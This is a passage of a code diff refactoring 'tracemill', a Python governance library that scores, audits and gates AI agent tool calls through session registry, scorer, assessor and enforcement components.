-                    event.source_event_key,
-                    attempts,
-                    self._MAX_PHASE23_ATTEMPTS,
-                    phase23_exc,
-                )
-                # Persist attempt count in reservation so it survives process restarts
-                # Preserve the snapshot so retries still use event-time state
-                try:
-                    reservation_json = json.dumps(
-                        {
-                            "reserved": True,
-                            "phase23_attempts": attempts,
-                            "snapshot": self._codec.serialize_snapshot(snapshot),
-                        }
-                    )
-                    self._store.execute_in_transaction(
-                        "UPDATE processed_events SET session_meta_json = ? WHERE source_event_key = ?",
-                        (reservation_json, event.source_event_key),
-                    )
-                    self._store.commit()
-                    self._store.cache_processed(event.source_event_key, reservation_json)
-                except (sqlite3.OperationalError, sqlite3.IntegrityError):
-                    self._store.rollback()
-                return SessionMeta(
-                    classification=None,
-                    risk_assessment=None,
-                    recommendation=None,
-                    budget_snapshot=snapshot.budget,
-                    drift=None,
-                    mcp_alerts=(),
-                    evidence=None,
-                )
-
-        # Phase 2/3 succeeded — clear retry counter ONLY after finalization commits (below)
-        phase23_key_to_clear = event.source_event_key
-
-        # Assessment succeeded — surface its verdict + deferred MCP writes
-        meta = assessment.meta
-
-        # Finalize idempotency record + deferred MCP writes in single transaction
-        try:
-            meta_json = json.dumps(self._codec.serialize_meta(meta))
-            self._store.execute_in_transaction(
-                "UPDATE processed_events SET session_meta_json = ? WHERE source_event_key = ?",
-                (meta_json, event.source_event_key),
-            )
-            if assessment.mcp_deferred_writes:
-                self._commit_mcp_writes_no_commit(assessment.mcp_deferred_writes)
-            self._store.commit()
-            self._store.cache_processed(event.source_event_key, meta_json)
-        except (
-            sqlite3.OperationalError,
-            sqlite3.IntegrityError,
-            json.JSONDecodeError,
-            KeyError,
-            TypeError,
-            ValueError,
-            AttributeError,
-        ) as e:
-            import logging
-
-            logging.getLogger(__name__).error(
-                "Finalization commit failed for event %s: %s — will retry on next delivery",
-                event.source_event_key,
-                e,
-            )
-            self._store.rollback()
-            # Event stays reserved; next delivery re-runs Phase 2/3
-            # Do NOT clear retry counter — finalization did not commit
-            return SessionMeta(
-                classification=meta.classification,
-                risk_assessment=meta.risk_assessment,
-                recommendation=meta.recommendation,
-                budget_snapshot=snapshot.budget,
-                drift=None,
-                mcp_alerts=(),
-                evidence=None,
-            )
-
-        # Only clear retry counter after successful finalization commit
-        self._phase23_attempts.pop(phase23_key_to_clear, None)
-        # Also clean session key tracking to prevent unbounded growth
-        session_keys = self._phase23_session_keys.get(session_id)
-        if session_keys:
-            session_keys.discard(phase23_key_to_clear)
-            if not session_keys:
-                del self._phase23_session_keys[session_id]
-        return meta
-
-    def _commit_mcp_writes_no_commit(self, writes: tuple) -> None:
-        """Execute deferred MCP writes without committing — caller owns transaction."""
-        for write in writes:
-            if write.kind == "upsert":
-                profile = json.loads(write.payload)
-                self._store.execute_in_transaction(
-                    """INSERT OR IGNORE INTO mcp_fingerprints
-                       (server, tool_name, description_hash, schema_hash, registered_effect,
-                        registered_role, registered_capabilities, registered_scope, clearance, first_seen, last_seen)
-                       VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?)""",
-                    (
-                        write.server,
-                        write.tool_name,
-                        profile["description_hash"],
-                        profile["schema_hash"],
-                        profile.get("registered_effect"),
-                        profile.get("registered_role"),
-                        profile.get("registered_capabilities"),
-                        profile.get("registered_scope"),
-                        profile.get("clearance"),
-                        profile["first_seen"],
-                        profile["last_seen"],
-                    ),
-                )
-            elif write.kind == "last_seen":
-                self._store.execute_in_transaction(
-                    "UPDATE mcp_fingerprints SET last_seen = ? WHERE server = ? AND tool_name = ?",
-                    (write.payload, write.server, write.tool_name),
-                )
-
-    def _write_session_summary(self, session_id: str, snapshot: "SessionStateSnapshot") -> None:
-        """Write session summary to session_summaries table (idempotent — won't overwrite existing)."""
-        import json as json_mod
-        import logging
-
-        now = datetime.now(timezone.utc).isoformat()
-        budget_json = json_mod.dumps(
-            {
-                "total_tool_calls": snapshot.budget.total_tool_calls,
-                "total_tokens": snapshot.budget.total_tokens,
-                "pressure": snapshot.budget.pressure,
-            }
-        )
-        try:
-            # INSERT OR IGNORE: first delivery records started_at/ended_at; duplicates are no-ops
-            self._store.connection.execute(
-                """INSERT OR IGNORE INTO session_summaries
-                   (session_id, started_at, ended_at, total_events, dropped_events, budget_snapshot_json)
-                   VALUES (?, ?, ?, ?, ?, ?)""",
-                (session_id, now, now, snapshot.event_count, snapshot.dropped_events, budget_json),
-            )
-            self._store.connection.commit()
-        except sqlite3.OperationalError as e:
-            logging.getLogger(__name__).warning(
-                "Failed to write session summary for %s: %s", session_id, e
-            )
+        """Full mutating pipeline: Phase 1 -> 2 -> 3 (delegates to SessionMonitor)."""
+        return self._monitor.process_event(ctx)
 
     # ─── Framework gating methods ────────────────────────────────────────────────
     #

--- a/src/tracemill/governance/pipeline.py
+++ b/src/tracemill/governance/pipeline.py
@@ -735,6 +735,21 @@ class GovernancePipeline:
         self._persist_score(ctx.event.source_event_key, ctx.event.session_id, meta)
         return meta
 
+    def observe_event(self, event: "tracemill.types.SessionEvent") -> "SessionMeta":
+        """Observation-path scoring for use as a live pipeline stage.
+
+        Unlike :meth:`score_tool_call_event` (read-only preflight), this runs the
+        full state-mutating observation path (budget/taint/drift accrual plus
+        classification, assessment, and recommendation) and returns the
+        ``SessionMeta`` to stamp onto the event's ``metadata.governance``.
+
+        This is the method :class:`~tracemill.pipeline.EventPipeline` calls when a
+        governance stage is wired in, making governance one stage of the pipeline
+        rather than a separate track.
+        """
+        ctx = self.context_from_session_event(event)
+        return self.process_event(ctx)
+
     def _persist_score(self, source_event_key: str, session_id: str, meta: "SessionMeta") -> None:
         """Persist a scoring result to the audit trail.
 

--- a/src/tracemill/governance/pipeline.py
+++ b/src/tracemill/governance/pipeline.py
@@ -8,13 +8,12 @@ import uuid
 from datetime import datetime, timezone
 from typing import TYPE_CHECKING, Literal
 
+from tracemill.governance.assessor import DefaultAssessor
 from tracemill.governance.registry import SessionRegistry
 from tracemill.governance.results import (
     Evidence,
     EvidencePointer,
     EscalationContext,
-    Phase3Result,
-    RecommendationResult,
     RecommendedAction,
     RiskRecommendation,
     SessionMeta,
@@ -26,7 +25,7 @@ if TYPE_CHECKING:
 
     from tracemill.classify.config import ClassificationEngine
     from tracemill.governance.budget import BudgetThresholds, BudgetTracker
-    from tracemill.governance.labeler import GovernanceLabeler, GovernanceResult
+    from tracemill.governance.labeler import GovernanceLabeler
     from tracemill.governance.persistence import SystemStore
     from tracemill.governance.rules import Rule
     from tracemill.governance.state import SessionState, SessionStateSnapshot
@@ -94,6 +93,7 @@ class GovernancePipeline:
         self.policy: "GatePolicy | None" = policy
         self._gate_lock = threading.Lock()
         self._registry = SessionRegistry(store)
+        self._assessor = DefaultAssessor(labeler, rules, engine)
         self._write_failures: dict[str, int] = {}  # session_id → consecutive failure count
         self._MAX_WRITE_FAILURES = 10
         self._phase23_attempts: dict[str, int] = {}  # source_event_key → attempt count
@@ -875,26 +875,7 @@ class GovernancePipeline:
 
         # ── Phase 2/3 (side-effect-free) ──
         snapshot = transient.snapshot()
-        enrichment_ctx = self._with_snapshot(ctx, snapshot)
-
-        gov_result = self._labeler.label(enrichment_ctx)
-        phase3 = self._phase3(enrichment_ctx, gov_result, snapshot)
-
-        rec = None
-        evidence = None
-        if phase3.recommendation_result:
-            rec = phase3.recommendation_result.recommendation
-            evidence = phase3.recommendation_result.evidence
-
-        return SessionMeta(
-            classification=gov_result.classification,
-            risk_assessment=phase3.risk_assessment,
-            recommendation=rec,
-            budget_snapshot=snapshot.budget,
-            drift=gov_result.drift_result,
-            mcp_alerts=gov_result.mcp_alerts,
-            evidence=evidence,
-        )
+        return self._assessor.assess(ctx, snapshot).meta
 
     def get_or_create_state(self, session_id: str) -> "SessionState":
         """Get or create session state, rehydrating from the store on a miss."""
@@ -1041,12 +1022,8 @@ class GovernancePipeline:
                 snapshot = state.snapshot()
         else:
             snapshot = snapshot_for_reservation
-        enrichment_ctx = self._with_snapshot(ctx, snapshot)
         try:
-            gov_result = self._labeler.label(enrichment_ctx)
-
-            # ── Phase 3: Risk + Rules + Evidence ──
-            phase3 = self._phase3(enrichment_ctx, gov_result, snapshot)
+            assessment = self._assessor.assess(ctx, snapshot)
         except Exception as phase23_exc:
             import logging
 
@@ -1139,22 +1116,8 @@ class GovernancePipeline:
         # Phase 2/3 succeeded — clear retry counter ONLY after finalization commits (below)
         phase23_key_to_clear = event.source_event_key
 
-        # Build SessionMeta
-        rec = None
-        evidence = None
-        if phase3.recommendation_result:
-            rec = phase3.recommendation_result.recommendation
-            evidence = phase3.recommendation_result.evidence
-
-        meta = SessionMeta(
-            classification=gov_result.classification,
-            risk_assessment=phase3.risk_assessment,
-            recommendation=rec,
-            budget_snapshot=snapshot.budget,
-            drift=gov_result.drift_result,
-            mcp_alerts=gov_result.mcp_alerts,
-            evidence=evidence,
-        )
+        # Assessment succeeded — surface its verdict + deferred MCP writes
+        meta = assessment.meta
 
         # Finalize idempotency record + deferred MCP writes in single transaction
         try:
@@ -1163,8 +1126,8 @@ class GovernancePipeline:
                 "UPDATE processed_events SET session_meta_json = ? WHERE source_event_key = ?",
                 (meta_json, event.source_event_key),
             )
-            if gov_result.mcp_deferred_writes:
-                self._commit_mcp_writes_no_commit(gov_result.mcp_deferred_writes)
+            if assessment.mcp_deferred_writes:
+                self._commit_mcp_writes_no_commit(assessment.mcp_deferred_writes)
             self._store.commit()
             self._store.cache_processed(event.source_event_key, meta_json)
         except (
@@ -1187,9 +1150,9 @@ class GovernancePipeline:
             # Event stays reserved; next delivery re-runs Phase 2/3
             # Do NOT clear retry counter — finalization did not commit
             return SessionMeta(
-                classification=gov_result.classification,
-                risk_assessment=phase3.risk_assessment,
-                recommendation=rec,
+                classification=meta.classification,
+                risk_assessment=meta.risk_assessment,
+                recommendation=meta.recommendation,
                 budget_snapshot=snapshot.budget,
                 drift=None,
                 mcp_alerts=(),
@@ -1236,109 +1199,6 @@ class GovernancePipeline:
                     (write.payload, write.server, write.tool_name),
                 )
 
-    def _phase3(
-        self,
-        ctx: "EnrichmentContext",
-        result: "GovernanceResult",
-        snapshot: "SessionStateSnapshot" = None,
-    ) -> Phase3Result:
-        """Phase 3: risk assessment + rule evaluation + evidence + escalation context."""
-        from tracemill.governance.canonical import compute_canonical_hash
-        from tracemill.governance.risk_wrapper import assess_governance_risk
-        from tracemill.governance.rules import evaluate_rules
-
-        # Compute risk
-        risk = assess_governance_risk(
-            enriched_classification=result.classification,
-            command_analysis=ctx.command_analysis,
-            risk_modifiers=result.risk_modifiers,
-            engine=self._engine,
-            project_root=ctx.project_root,
-        )
-
-        # Evaluate rules
-        rule_match = evaluate_rules(self._rules, result.classification, risk)
-
-        if rule_match is None:
-            return Phase3Result(risk_assessment=risk, recommendation_result=None)
-
-        # Compute canonical hash
-        command = ctx.command_analysis.command if ctx.command_analysis else None
-        canonical_id = compute_canonical_hash(
-            result.classification,
-            command=command,
-            reason_code=rule_match.template.reason_code,
-        )
-
-        # Render transform suggestion (if template provided)
-        transform = self._render_transform(rule_match.template.transform, ctx)
-
-        # Build recommendation
-        recommendation = RiskRecommendation(
-            recommended_action=RecommendedAction(rule_match.template.recommended_action),
-            assessment=risk,
-            reason_code=rule_match.template.reason_code,
-            canonical_id=canonical_id,
-            message=rule_match.template.message,
-            transform=transform,
-        )
-
-        # Build evidence for non-allow actions
-        evidence = None
-        if recommendation.recommended_action in (
-            RecommendedAction.WARN,
-            RecommendedAction.ESCALATE,
-            RecommendedAction.DENY,
-        ):
-            # Build EscalationContext for escalate/deny
-            escalation = None
-            if recommendation.recommended_action in (
-                RecommendedAction.ESCALATE,
-                RecommendedAction.DENY,
-            ):
-                escalation = self._build_escalation(
-                    ctx,
-                    result,
-                    risk,
-                    recommendation,
-                    canonical_id,
-                    snapshot,
-                )
-
-            evidence = Evidence(
-                canonical_id=canonical_id,
-                timestamp=ctx.event.timestamp,
-                session_id=ctx.event.session_id,
-                mechanism=result.classification.mechanism,
-                effect=result.classification.effect,
-                scope=tuple(sorted(result.classification.scope)),
-                role=tuple(sorted(result.classification.role)),
-                action=tuple(sorted(result.classification.action)),
-                capability=tuple(sorted(result.classification.capability)),
-                structure=tuple(sorted(result.classification.structure)),
-                source_labels=tuple(sorted(result.classification.source_labels)),
-                recommended_action=recommendation.recommended_action,
-                risk_score=risk.score,
-                risk_factors=risk.factors,
-                mitre_techniques=risk.mitre,
-                pointers=(
-                    EvidencePointer(
-                        event_id=ctx.event.event_id,
-                        rule_id=rule_match.rule_id,
-                        detector="rule_engine",
-                    ),
-                ),
-                escalation=escalation,
-            )
-
-        return Phase3Result(
-            risk_assessment=risk,
-            recommendation_result=RecommendationResult(
-                recommendation=recommendation,
-                evidence=evidence,
-            ),
-        )
-
     def _infer_phase(self, ctx: "EnrichmentContext") -> str | None:
         """Infer session phase from classification/event."""
         from tracemill.governance.types import ToolCallEvent
@@ -1363,120 +1223,6 @@ class GovernancePipeline:
         if cls.effect == "informational":
             return "exploration"
         return "exploration"
-
-    def _with_snapshot(
-        self, ctx: "EnrichmentContext", snapshot: "SessionStateSnapshot"
-    ) -> "EnrichmentContext":
-        """Create new context with session state snapshot."""
-        import dataclasses
-
-        return dataclasses.replace(ctx, session_state=snapshot)
-
-    def _render_transform(self, template, ctx: "EnrichmentContext") -> TransformSuggestion | None:
-        """Render TransformTemplate → TransformSuggestion using event data.
-
-        Returns None if target cannot be located in event data.
-        """
-        if template is None:
-            return None
-
-        from tracemill.governance.types import ToolCallEvent
-        import logging
-
-        try:
-            if isinstance(ctx.event, ToolCallEvent) and ctx.command_analysis:
-                original = ctx.command_analysis.command or ""
-                replacement = template.replacement if template.replacement is not None else None
-                return TransformSuggestion(
-                    target_kind="shell_arg",
-                    path=f"command[0:{len(original)}]",
-                    original=original,
-                    replacement=replacement,
-                    rationale=template.description or "Rule suggests transformation",
-                    confidence="medium",
-                )
-            elif isinstance(ctx.event, ToolCallEvent):
-                args_str = ctx.event.tool_args_json
-                return TransformSuggestion(
-                    target_kind="tool_arg",
-                    path="$.args",
-                    original=args_str[:200],
-                    replacement=None,
-                    rationale=template.description or "Rule suggests transformation",
-                    confidence="low",
-                )
-        except (KeyError, AttributeError, TypeError) as e:
-            logging.getLogger(__name__).debug(
-                "Transform rendering failed for template %s: %s", template, e
-            )
-
-        return None
-
-    def _build_escalation(
-        self,
-        ctx: "EnrichmentContext",
-        result: "GovernanceResult",
-        risk,
-        recommendation,
-        canonical_id: str,
-        snapshot,
-    ) -> EscalationContext:
-        """Build full EscalationContext for escalate/deny recommendations."""
-        from tracemill.governance.types import ToolCallEvent
-
-        tool_name = ""
-        tool_args_summary = ""
-        if isinstance(ctx.event, ToolCallEvent):
-            tool_name = ctx.event.tool_name or ""
-            # Sanitize args — truncate and remove obvious secrets
-            raw_args = ctx.event.tool_args_json or ""
-            tool_args_summary = self._sanitize_args(raw_args)
-
-        pii_taint = (
-            "pii_exposure" in result.classification.capability
-            or "credential_exposure" in result.classification.capability
-        )
-        ifc_violations = result.risk_modifiers.ifc_violations
-
-        budget = snapshot.budget if snapshot else None
-
-        return EscalationContext(
-            canonical_id=canonical_id,
-            classification=result.classification,
-            recommended_action=recommendation.recommended_action,
-            reason_code=recommendation.reason_code,
-            mitre_techniques=risk.mitre,
-            drift=result.drift_result,
-            budget_snapshot=budget,
-            pii_taint=pii_taint,
-            ifc_violations=ifc_violations,
-            tool_name=tool_name,
-            tool_args_summary=tool_args_summary,
-            session_id=ctx.event.session_id,
-            timestamp=ctx.event.timestamp,
-        )
-
-    def _sanitize_args(self, raw_args: str, max_len: int = 500) -> str:
-        """Sanitize tool args for escalation context — remove secrets, truncate."""
-        import re
-
-        # Word-boundary anchored to avoid matching "monkey", "turkey", "keyboard" etc.
-        _SENSITIVE_KEYS = r"(?<![a-zA-Z])(?:password|secret|token|api_key|credential|auth|authorization)(?![a-zA-Z])"
-        # Handle JSON-style: "key": "value" or "key":"value"
-        sanitized = re.sub(
-            r'(?i)(["\']?(?:' + _SENSITIVE_KEYS + r')["\']?\s*[:=]\s*)["\']([^"\']*)["\']',
-            r'\1"<REDACTED>"',
-            raw_args,
-        )
-        # Handle bare (non-quoted) values: key=value or key: value (no quotes around value)
-        sanitized = re.sub(
-            r"(?i)((?:" + _SENSITIVE_KEYS + r')\s*[:=]\s*)([^\s"\'}{,\]\)]+)',
-            r"\1<REDACTED>",
-            sanitized,
-        )
-        if len(sanitized) > max_len:
-            sanitized = sanitized[:max_len] + "..."
-        return sanitized
 
     def _write_session_summary(self, session_id: str, snapshot: "SessionStateSnapshot") -> None:
         """Write session summary to session_summaries table (idempotent — won't overwrite existing)."""

--- a/src/tracemill/governance/registry.py
+++ b/src/tracemill/governance/registry.py
@@ -1,0 +1,63 @@
+"""Per-session residency for governance: the single owner of live SessionState."""
+
+from __future__ import annotations
+
+from typing import TYPE_CHECKING
+
+if TYPE_CHECKING:
+    from tracemill.governance.persistence import SystemStore
+    from tracemill.governance.state import SessionState
+
+
+class SessionRegistry:
+    """Owns per-session residency — the one home for live SessionState.
+
+    Centralizing the residency map here means no two code paths can create
+    divergent state for the same session (the pipeline previously carried two
+    uncoordinated creation paths). Two creation strategies share this single
+    map, and both return an already-resident state when one exists:
+
+      * ``get_or_create`` rehydrates from the durable store, so the observation
+        channel's crash recovery sees persisted budgets.
+      * ``ensure`` creates thread-safe ephemeral state (never touching SQLite
+        cross-thread), which the gate channel uses for enforcement context.
+    """
+
+    def __init__(self, store: "SystemStore") -> None:
+        self._store = store
+        self._states: dict[str, "SessionState"] = {}
+
+    def __contains__(self, session_id: str) -> bool:
+        return session_id in self._states
+
+    def get(self, session_id: str) -> "SessionState | None":
+        """Return the resident state for a session, or None if not resident."""
+        return self._states.get(session_id)
+
+    def get_or_create(self, session_id: str) -> "SessionState":
+        """Return the resident state, rehydrating from the store on a miss."""
+        from tracemill.governance.state import SessionState
+
+        if session_id not in self._states:
+            self._states[session_id] = SessionState.load_from_db(session_id, self._store.connection)
+        return self._states[session_id]
+
+    def ensure(self, session_id: str) -> "SessionState":
+        """Return the resident state, creating fresh ephemeral state on a miss.
+
+        Never rehydrates from SQLite, so it is safe to call from any thread.
+        Uses ``setdefault`` so concurrent callers converge on one instance.
+        """
+        from tracemill.governance.state import SessionState
+
+        if session_id not in self._states:
+            self._states.setdefault(session_id, SessionState(session_id=session_id))
+        return self._states[session_id]
+
+    def replace(self, session_id: str, state: "SessionState") -> None:
+        """Install a state instance for a session (used after a forced reload)."""
+        self._states[session_id] = state
+
+    def evict(self, session_id: str) -> "SessionState | None":
+        """Remove and return the resident state for a session, if any."""
+        return self._states.pop(session_id, None)

--- a/src/tracemill/governance/scorer.py
+++ b/src/tracemill/governance/scorer.py
@@ -197,11 +197,25 @@ class Scorer:
     def _persist_score(self, source_event_key: str, session_id: str, meta: "SessionMeta") -> None:
         """Persist a scoring result to the audit trail.
 
-        Uses a distinct source_event_key (score:{id}) that never collides with
-        observation events. If the same tool call later executes and arrives via
-        the standard pipeline, both records coexist — enabling correlation of
+        Enforces a distinct, ``score:``-namespaced source_event_key so a scoring
+        record never collides with the observation record for the same event. The
+        dict intake path already mints a ``score:`` key in
+        :meth:`ToolCallEvent.from_dict`; the SessionEvent path (score_tool_call_event)
+        carries the raw ``event.id``, so the namespace is applied here to keep both
+        intake channels consistent. If the same tool call later executes and arrives
+        via the standard pipeline, both records coexist — enabling correlation of
         'what we recommended' vs 'what actually happened'.
         """
+        # Guarantee the score: namespace regardless of intake channel — idempotent
+        # for the dict path (already prefixed). Without it, a SessionEvent scored via
+        # score_tool_call_event would persist under its raw event id, and a later
+        # observation of that same event would be swallowed as a duplicate
+        # (is_duplicate short-circuits process_event before Phase 1 advances state).
+        audit_key = (
+            source_event_key
+            if source_event_key.startswith("score:")
+            else f"score:{source_event_key}"
+        )
         try:
             meta_dict = self._codec.serialize_meta(meta)
             meta_dict["scored"] = True
@@ -209,10 +223,10 @@ class Scorer:
             now = datetime.now(timezone.utc).isoformat()
             self._store.execute_in_transaction(
                 "INSERT OR IGNORE INTO processed_events (source_event_key, session_id, session_meta_json, processed_at) VALUES (?, ?, ?, ?)",
-                (source_event_key, session_id, meta_json, now),
+                (audit_key, session_id, meta_json, now),
             )
             self._store.commit()
-            self._store.cache_processed(source_event_key, meta_json)
+            self._store.cache_processed(audit_key, meta_json)
         except Exception:
             # Best-effort persistence — scoring result was already returned to caller.
             # If this fails, the score is still usable but won't be in the audit trail.

--- a/src/tracemill/governance/scorer.py
+++ b/src/tracemill/governance/scorer.py
@@ -1,0 +1,247 @@
+"""Read-only scoring / preview path for governance.
+
+The Scorer answers "what would the pipeline conclude about this tool call?"
+without mutating any persisted session state. It runs Phase 1 against a detached
+clone (preflight_event), then the side-effect-free Assessor, and returns either a
+SessionMeta or a unified EventTrace. It also owns the audit-only persistence of
+scoring results and the fail-closed ESCALATE fallback. This is the read side;
+the state-mutating write side lives in the SessionMonitor.
+"""
+
+from __future__ import annotations
+
+import json
+import uuid
+from datetime import datetime, timezone
+from typing import TYPE_CHECKING
+
+from tracemill.governance.results import (
+    RecommendedAction,
+    RiskRecommendation,
+    SessionMeta,
+)
+
+if TYPE_CHECKING:
+    import tracemill.types
+
+    from tracemill.governance.assessor import Assessor
+    from tracemill.governance.codec import MetaCodec
+    from tracemill.governance.context import ContextBuilder
+    from tracemill.governance.persistence import SystemStore
+    from tracemill.governance.phase1 import Phase1
+    from tracemill.governance.registry import SessionRegistry
+    from tracemill.governance.types import EnrichmentContext, ToolCallEvent
+    from tracemill.trace import EventTrace
+
+
+class Scorer:
+    """Read-only governance scoring: preview assessment without persisting state."""
+
+    def __init__(
+        self,
+        context: "ContextBuilder",
+        phase1: "Phase1",
+        assessor: "Assessor",
+        registry: "SessionRegistry",
+        store: "SystemStore",
+        codec: "MetaCodec",
+    ) -> None:
+        self._context = context
+        self._phase1 = phase1
+        self._assessor = assessor
+        self._registry = registry
+        self._store = store
+        self._codec = codec
+
+    def score_tool_call(self, payload: dict) -> "EventTrace":
+        """Score a pending tool call against current session state.
+
+        Pure scoring — returns a fully-enriched EventTrace. Does NOT fire any callbacks.
+        Downstream apps decide what to do with the result.
+
+        Args:
+            payload: Dict with at minimum:
+                - ``tool_name``: str
+                - ``tool_input``: dict
+                - ``session_id``: str
+              Optional:
+                - ``server_namespace``: str
+                - ``project_root``: str
+
+        Returns:
+            EventTrace — the unified pipeline type with classification + assessment.
+        """
+        return self.score_event(payload)
+
+    def score_event(self, payload: dict) -> "EventTrace":
+        """Internal: build event from dict, score it, return EventTrace."""
+        from tracemill.governance.types import ToolCallEvent
+
+        event = ToolCallEvent.from_dict(payload)
+        try:
+            ctx = self._context.from_tool_call(event)
+        except Exception as exc:
+            meta = self._fail_closed(exc)
+            return self._meta_to_trace(payload, event, meta, kind="tool.call.started")
+
+        try:
+            meta = self.preflight_event(ctx)
+        except Exception as exc:
+            meta = self._fail_closed(exc, classification=ctx.base_classification)
+            return self._meta_to_trace(payload, event, meta, kind="tool.call.started")
+
+        self._persist_score(event.source_event_key, event.session_id, meta)
+        return self._meta_to_trace(payload, event, meta, kind="tool.call.started")
+
+    def _meta_to_trace(
+        self,
+        payload: dict,
+        event: "ToolCallEvent",
+        meta: "SessionMeta",
+        *,
+        kind: str = "tool.call.started",
+    ) -> "EventTrace":
+        """Convert internal pipeline types into a unified EventTrace."""
+
+        from tracemill.trace import EventTrace
+
+        cls = meta.classification
+        risk = meta.risk_assessment
+        rec = meta.recommendation
+        raw = payload if isinstance(payload, dict) else {}
+
+        return EventTrace(
+            id=event.event_id,
+            kind=kind,
+            session_id=event.session_id,
+            tool_call_id=raw.get("tool_call_id") or str(uuid.uuid4()),
+            timestamp=event.timestamp,
+            source_key=event.source_event_key,
+            raw_event=raw,
+            parent_tool_call_id=raw.get("parent_tool_call_id"),
+            # Tool identity (gen_ai.tool.* aligned)
+            tool_name=raw.get("tool_name"),
+            tool_input=raw.get("tool_input") or {},
+            tool_result=raw.get("tool_result") or raw.get("result"),
+            target_resource=raw.get("target_resource"),
+            # Classification
+            mechanism=cls.mechanism if cls else None,
+            effect=cls.effect if cls else None,
+            scope=tuple(cls.scope) if cls else (),
+            role=tuple(cls.role) if cls else (),
+            action=tuple(cls.action) if cls else (),
+            capability=tuple(cls.capability) if cls else (),
+            structure=tuple(cls.structure) if cls else (),
+            canonical_tool=raw.get("tool_name"),
+            # Assessment
+            risk_score=risk.score if risk else None,
+            risk_band=risk.level if risk else None,
+            suggested_action=rec.recommended_action.value if rec else None,
+            reason=rec.reason_code if rec else None,
+            # Stage
+            stage="assessed" if risk else ("classified" if cls else "adapted"),
+        )
+
+    def score_tool_call_event(self, event: "tracemill.types.SessionEvent") -> "SessionMeta":
+        """Score an enriched SessionEvent via the canonical bridge.
+
+        Same as score_tool_call but accepts a SessionEvent (from adapters/Enricher)
+        instead of a raw dict.
+
+        Returns:
+            SessionMeta — same shape sinks receive in the observation pipeline.
+        """
+        try:
+            ctx = self._context.from_session_event(event)
+        except Exception as exc:
+            return self._fail_closed(exc)
+
+        try:
+            meta = self.preflight_event(ctx)
+        except Exception as exc:
+            return self._fail_closed(exc, classification=ctx.base_classification)
+
+        self._persist_score(ctx.event.source_event_key, ctx.event.session_id, meta)
+        return meta
+
+    def preflight_event(self, ctx: "EnrichmentContext") -> "SessionMeta":
+        """Simulate full pipeline (Phase 1/2/3) without persisting state changes.
+
+        Creates a transient copy of session state, applies Phase 1 mutations
+        (budget, taint, drift) to it, then runs Phase 2/3 against the result.
+        The real state and DB are never modified.
+
+        Used by .score_tool_call() to predict what the pipeline would produce if the
+        event actually executed, without committing any side effects.
+        """
+        from tracemill.governance.state import SessionState
+
+        session_id = ctx.event.session_id
+
+        # Use cached state if available; otherwise start fresh (thread-safe,
+        # avoids cross-thread sqlite3 access for unknown sessions)
+        state = self._registry.get(session_id)
+        if state is None:
+            state = SessionState(session_id=session_id)
+
+        # Thread-safe clone — never touches state._db
+        transient = state.clone_detached()
+
+        # ── Phase 1 simulation (non-persisted) ──
+        self._phase1.apply(ctx, transient)
+
+        # ── Phase 2/3 (side-effect-free) ──
+        snapshot = transient.snapshot()
+        return self._assessor.assess(ctx, snapshot).meta
+
+    def _persist_score(self, source_event_key: str, session_id: str, meta: "SessionMeta") -> None:
+        """Persist a scoring result to the audit trail.
+
+        Uses a distinct source_event_key (score:{id}) that never collides with
+        observation events. If the same tool call later executes and arrives via
+        the standard pipeline, both records coexist — enabling correlation of
+        'what we recommended' vs 'what actually happened'.
+        """
+        try:
+            meta_dict = self._codec.serialize_meta(meta)
+            meta_dict["scored"] = True
+            meta_json = json.dumps(meta_dict)
+            now = datetime.now(timezone.utc).isoformat()
+            self._store.execute_in_transaction(
+                "INSERT OR IGNORE INTO processed_events (source_event_key, session_id, session_meta_json, processed_at) VALUES (?, ?, ?, ?)",
+                (source_event_key, session_id, meta_json, now),
+            )
+            self._store.commit()
+            self._store.cache_processed(source_event_key, meta_json)
+        except Exception:
+            # Best-effort persistence — scoring result was already returned to caller.
+            # If this fails, the score is still usable but won't be in the audit trail.
+            try:
+                self._store.rollback()
+            except Exception:
+                pass
+
+    def _fail_closed(self, exc: Exception, classification=None) -> "SessionMeta":
+        """Produce a SessionMeta that signals ESCALATE due to internal error."""
+        from tracemill.classify.risk import RiskAssessment
+
+        reason = f"internal_error: {type(exc).__name__}"
+        risk = RiskAssessment(
+            score=0,
+            level="unknown",
+            confidence="low",
+            factors=(reason,),
+            mitre=(),
+            version="1",
+        )
+        recommendation = RiskRecommendation(
+            recommended_action=RecommendedAction.ESCALATE,
+            assessment=risk,
+            reason_code=reason,
+            canonical_id="error",
+        )
+        return SessionMeta(
+            classification=classification,
+            risk_assessment=risk,
+            recommendation=recommendation,
+        )

--- a/src/tracemill/governance/shield.py
+++ b/src/tracemill/governance/shield.py
@@ -1,0 +1,318 @@
+"""Runtime enforcement — the Shield.
+
+Where the :class:`~tracemill.governance.assessor.Assessor` *assesses* and the monitor
+*observes*, the :class:`Shield` *enforces*. It is the pre-execution checkpoint on the
+gate channel: a tool call reaches the shield's preflight chain BEFORE it executes, and
+only calls the shield allows go on to run. The downstream trace therefore only ever
+observes what the gate allowed — which is why the tool-call counter advances here, at
+the single post-execution observation point (:meth:`_observe_completed_call`), and the
+preflight chain only ever *reads* it.
+
+Collaborators are injected (DIP): a :class:`SessionRegistry` for per-session gate state,
+a ``scorer`` that turns a raw payload into an assessed ``EventTrace``, and a
+``policy_provider`` that yields the current :class:`GatePolicy` (kept live so callers may
+swap the policy after construction).
+"""
+
+from __future__ import annotations
+
+from typing import TYPE_CHECKING, Callable
+
+if TYPE_CHECKING:
+    from tracemill.governance.registry import SessionRegistry
+    from tracemill.sdk.gate_policy import GatePolicy
+    from tracemill.sdk.gate_types import (
+        GateContext,
+        PostflightVerdict,
+        ToolCallRequest,
+        ToolCallResult,
+    )
+    from tracemill.sdk.verdict import Verdict
+    from tracemill.trace import EventTrace
+
+
+class Shield:
+    """Runtime enforcement checkpoint — preflight gating + postflight action.
+
+    Single responsibility: given an assessed call, decide ALLOW/DENY before execution
+    and the most-restrictive post-execution action, failing closed on any error. It
+    holds no assessment or persistence logic; it reads gate state through the registry
+    and advances the tool-call counter only when an allowed call completes.
+    """
+
+    def __init__(
+        self,
+        registry: "SessionRegistry",
+        policy_provider: "Callable[[], GatePolicy | None]",
+        scorer: "Callable[[dict], EventTrace]",
+    ) -> None:
+        import threading
+
+        self._registry = registry
+        self._policy_provider = policy_provider
+        self._scorer = scorer
+        self._lock = threading.Lock()
+
+    # ── Orchestration (called by framework adapters) ───────────────────────────
+
+    def score_and_gate_preflight(self, payload: dict) -> tuple:
+        """Score a tool call and run the preflight gate chain. Thread-safe.
+
